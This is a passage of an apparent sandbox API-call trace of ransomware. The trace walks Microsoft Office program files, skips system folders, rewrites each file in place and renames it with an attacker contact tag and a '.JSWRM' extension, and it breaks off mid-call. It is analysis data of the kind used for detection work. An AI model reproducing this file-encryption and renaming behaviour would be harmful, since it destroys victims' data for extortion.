[0114.084] lstrcmpiW (lpString1="GROOVE.HXS", lpString2="...") returned 1 [0114.084] lstrcmpiW (lpString1="GROOVE.HXS", lpString2="windows") returned -1 [0114.084] lstrcmpiW (lpString1="GROOVE.HXS", lpString2="recovery") returned -1 [0114.084] lstrcmpiW (lpString1="GROOVE.HXS", lpString2="perflogs") returned -1 [0114.084] lstrcmpiW (lpString1="GROOVE.HXS", lpString2="documents and settings") returned 1 [0114.084] lstrcmpiW (lpString1="GROOVE.HXS", lpString2="$RECYCLE.BIN") returned 1 [0114.084] lstrcmpiW (lpString1="GROOVE.HXS", lpString2="system volume information") returned -1 [0114.084] lstrcmpiW (lpString1="GROOVE.HXS", lpString2="msocache") returned -1 [0114.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0114.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GROOVE.HXS", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0114.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GROOVE.HXS", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GROOVE.HXS", lpUsedDefaultChar=0x0) returned 10 [0114.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0114.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0114.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GROOVE.HXS", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0114.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GROOVE.HXS", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GROOVE.HXS", lpUsedDefaultChar=0x0) returned 10 [0114.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0114.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0114.084] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224cc8 | out: hHeap=0x1e0000) returned 1 [0114.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.084] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224cc8 [0114.084] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GROOVE.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\groove.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.085] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=128972) returned 1 [0114.085] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f7c0) returned 0x24c1d0 [0114.085] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1f7c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1f7c0, lpOverlapped=0x0) returned 1 [0114.094] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.094] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1f7c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1f7c0, lpOverlapped=0x0) returned 1 [0114.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0114.096] CloseHandle (hObject=0x238) returned 1 [0114.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0114.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0114.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0114.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0114.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0114.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0114.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0114.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0114.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0114.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0114.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.096] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GROOVE.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\groove.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GROOVE.HXS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\groove.hxs.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0114.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0114.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224cc8 | out: hHeap=0x1e0000) returned 1 [0114.098] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3b181c2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3b181c2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe3bd6df0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x87d4a8, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="GrooveIntlResource.dll", cAlternateFileName="GROOVE~1.DLL")) returned 1 [0114.098] lstrcmpiW (lpString1="GrooveIntlResource.dll", lpString2=".") returned 1 [0114.098] lstrcmpiW (lpString1="GrooveIntlResource.dll", lpString2="..") returned 1 [0114.098] lstrcmpiW (lpString1="GrooveIntlResource.dll", lpString2="...") returned 1 [0114.098] lstrcmpiW (lpString1="GrooveIntlResource.dll", lpString2="windows") returned -1 [0114.098] lstrcmpiW (lpString1="GrooveIntlResource.dll", lpString2="recovery") returned -1 [0114.098] lstrcmpiW (lpString1="GrooveIntlResource.dll", lpString2="perflogs") returned -1 [0114.098] lstrcmpiW (lpString1="GrooveIntlResource.dll", lpString2="documents and settings") returned 1 [0114.098] lstrcmpiW (lpString1="GrooveIntlResource.dll", lpString2="$RECYCLE.BIN") returned 1 [0114.098] lstrcmpiW (lpString1="GrooveIntlResource.dll", lpString2="system volume information") returned -1 [0114.098] lstrcmpiW (lpString1="GrooveIntlResource.dll", lpString2="msocache") returned -1 [0114.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0114.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveIntlResource.dll", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0114.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0114.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveIntlResource.dll", cchWideChar=22, lpMultiByteStr=0x241038, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveIntlResource.dll", lpUsedDefaultChar=0x0) returned 22 [0114.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0114.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0114.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveIntlResource.dll", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0114.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0114.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveIntlResource.dll", cchWideChar=22, lpMultiByteStr=0x240fe8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveIntlResource.dll", lpUsedDefaultChar=0x0) returned 22 [0114.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0114.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0114.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0114.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0114.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0114.098] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9a05f3c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9a05f3c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9a05f3c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x272, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="GROOVE_COL.HXC", cAlternateFileName="GROOVE~1.HXC")) returned 1 [0114.098] lstrcmpiW (lpString1="GROOVE_COL.HXC", lpString2=".") returned 1 [0114.098] lstrcmpiW (lpString1="GROOVE_COL.HXC", lpString2="..") returned 1 [0114.098] lstrcmpiW (lpString1="GROOVE_COL.HXC", lpString2="...") returned 1 [0114.098] lstrcmpiW (lpString1="GROOVE_COL.HXC", lpString2="windows") returned -1 [0114.098] lstrcmpiW (lpString1="GROOVE_COL.HXC", lpString2="recovery") returned -1 [0114.098] lstrcmpiW (lpString1="GROOVE_COL.HXC", lpString2="perflogs") returned -1 [0114.099] lstrcmpiW (lpString1="GROOVE_COL.HXC", lpString2="documents and settings") returned 1 [0114.099] lstrcmpiW (lpString1="GROOVE_COL.HXC", lpString2="$RECYCLE.BIN") returned 1 [0114.099] lstrcmpiW (lpString1="GROOVE_COL.HXC", lpString2="system volume information") returned -1 [0114.099] lstrcmpiW (lpString1="GROOVE_COL.HXC", lpString2="msocache") returned -1 [0114.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0114.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GROOVE_COL.HXC", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0114.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GROOVE_COL.HXC", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GROOVE_COL.HXC", lpUsedDefaultChar=0x0) returned 14 [0114.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0114.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0114.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GROOVE_COL.HXC", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0114.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GROOVE_COL.HXC", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GROOVE_COL.HXC", lpUsedDefaultChar=0x0) returned 14 [0114.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0114.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0114.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0114.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0114.099] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GROOVE_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\groove_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.100] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=626) returned 1 [0114.100] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x270) returned 0x20b1f8 [0114.100] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x270, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x270, lpOverlapped=0x0) returned 1 [0114.101] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.101] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x270, lpOverlapped=0x0) returned 1 [0114.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0114.101] CloseHandle (hObject=0x238) returned 1 [0114.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0114.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0114.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0114.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0114.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0114.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0114.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0114.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0114.102] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GROOVE_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\groove_col.hxc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GROOVE_COL.HXC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\groove_col.hxc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0114.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0114.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0114.103] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa3dba42, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xa3dba42, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa3dba42, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xda, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="GROOVE_COL.HXT", cAlternateFileName="GROOVE~1.HXT")) returned 1 [0114.103] lstrcmpiW (lpString1="GROOVE_COL.HXT", lpString2=".") returned 1 [0114.103] lstrcmpiW (lpString1="GROOVE_COL.HXT", lpString2="..") returned 1 [0114.103] lstrcmpiW (lpString1="GROOVE_COL.HXT", lpString2="...") returned 1 [0114.103] lstrcmpiW (lpString1="GROOVE_COL.HXT", lpString2="windows") returned -1 [0114.103] lstrcmpiW (lpString1="GROOVE_COL.HXT", lpString2="recovery") returned -1 [0114.103] lstrcmpiW (lpString1="GROOVE_COL.HXT", lpString2="perflogs") returned -1 [0114.103] lstrcmpiW (lpString1="GROOVE_COL.HXT", lpString2="documents and settings") returned 1 [0114.103] lstrcmpiW (lpString1="GROOVE_COL.HXT", lpString2="$RECYCLE.BIN") returned 1 [0114.103] lstrcmpiW (lpString1="GROOVE_COL.HXT", lpString2="system volume information") returned -1 [0114.103] lstrcmpiW (lpString1="GROOVE_COL.HXT", lpString2="msocache") returned -1 [0114.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0114.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GROOVE_COL.HXT", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0114.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GROOVE_COL.HXT", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GROOVE_COL.HXT", lpUsedDefaultChar=0x0) returned 14 [0114.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0114.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0114.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GROOVE_COL.HXT", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0114.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GROOVE_COL.HXT", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GROOVE_COL.HXT", lpUsedDefaultChar=0x0) returned 14 [0114.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0114.104] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0114.104] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0114.104] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.104] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.104] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0114.104] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GROOVE_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\groove_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.119] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=218) returned 1 [0114.119] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ee50 [0114.119] ReadFile (in: hFile=0x238, lpBuffer=0x22ee50, nNumberOfBytesToRead=0xd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22ee50*, lpNumberOfBytesRead=0x345e89c*=0xd0, lpOverlapped=0x0) returned 1 [0114.120] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.120] WriteFile (in: hFile=0x238, lpBuffer=0x22ee50*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22ee50*, lpNumberOfBytesWritten=0x345e898*=0xd0, lpOverlapped=0x0) returned 1 [0114.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ee50 | out: hHeap=0x1e0000) returned 1 [0114.121] CloseHandle (hObject=0x238) returned 1 [0114.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0114.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0114.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0114.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0114.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0114.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0114.121] RtlAllocateHeap (HeapHandle=0x1e0000, 